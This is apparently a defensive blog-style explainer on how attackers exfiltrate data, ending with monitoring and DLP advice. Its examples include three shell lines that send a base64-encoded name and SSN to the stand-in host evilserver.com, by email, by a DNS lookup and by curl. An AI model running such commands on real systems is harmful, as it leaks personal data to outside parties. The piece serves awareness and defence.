Social Engineering

Social engineering and phishing remains one of the most popular methods for data exfiltration. Cyber criminals prey on human psychology relying on trust, fear or blackmail to manipulate an employee with access to sensitive data. Hackers can get a user's credentials and then login to an application and steal the data via methods the application provide or by doing screenshots. Alternatively, hackers can use spam/spoof emails to lure users into sending out data We need a copy of the monthly expense report by Friday. Thanks. Jim. That's not Jim.

Security Holes

Sometimes cyber criminals are able to exfiltrate data through holes left wide open because of a bug or human error. Things like weak passwords, unpatched systems or misconfigured systems can all lead to data exfiltration. If you have weak ssh credentials, hackers can simply login and steal any data they find. If your database has weak credentials, they can just query any data they need.

Outbound Email

Hackers can either phish your employees to send data out or they can email data out if they have broken into your network already. Either way, you should be monitoring your outbound email to look for suspicious activity. By doing thousands of these requests, hackers can steal a lot of data before being caught.

[hacker@yoursystem~]# echo "John Smith|123-45-6789" | base64
[hacker@yoursystem~]# Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=
[hacker@yoursystem~]# echo "Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=" | mailx -s "Testing" hacker@evilserver.com

DNS Tunneling

If hackers are in your systems, they can exfiltrate data using DNS tunneling techniques. Those typicall work like this. They find some date, hash it, then do a DNS lookup to a DNS server they control. Then they just look at their log file and get the data. By doing thousands of these requests, hackers can steal a lot of data before being caught. DNS Sinkholing can prevent this.

[hacker@yoursystem~]# echo "John Smith|123-45-6789" | base64
[hacker@yoursystem~]# Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=
[hacker@yoursystem~]# dig google.com @Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=.evilserver.com

A recent, more advanced DNS tunneling technique, was just discovered to backdoor into Windows at a university in Taiwan. While the vunerability has been patched, it just shows you how sophisticated hackers have become.

Another recent recent ASCII smuggling technique in Microsoft 365 Copilot shows that AI platforms are not immune to hacking either.

HTTP/HTTPS Request

If hackers are in your systems, they can exfiltrate data using HTTP/HTTPS reqeusts. Those typicall work like this. They find some date, hash it, then do an HTTP/HTTPS request to a web server they control. Then they just look at their log file and get the data. By doing thousands of these requests, hackers can steal a lot of data before being caught.

[hacker@yoursystem~]# echo "John Smith|123-45-6789" | base64
[hacker@yoursystem~]# Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=
[hacker@yoursystem~]# curl https://evilserver.com/Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=

Various Other Methods

The examples above are simple to demostrate the concepts. Malware and viruses can perform those tasks programatically. Using similar methods as above, hackers can using other means like ssh tunneling, ICMP, ARP or embed data into images, QR Code images and more. There was a case where the hacker embedded data into a company's website background image and then cyber criminals just went to the website and right click and saved the image and the data was stolen & disseminated easily. Once a hacker is in your system, there are various means to exfiltrate data without your knowledge. Cybersecurity tools like SIEM, Data Loss Prevention (DLP), lateral movement detection, and monitoring outbound ports and traffic through your next generation firewall can help stop data exfiltration.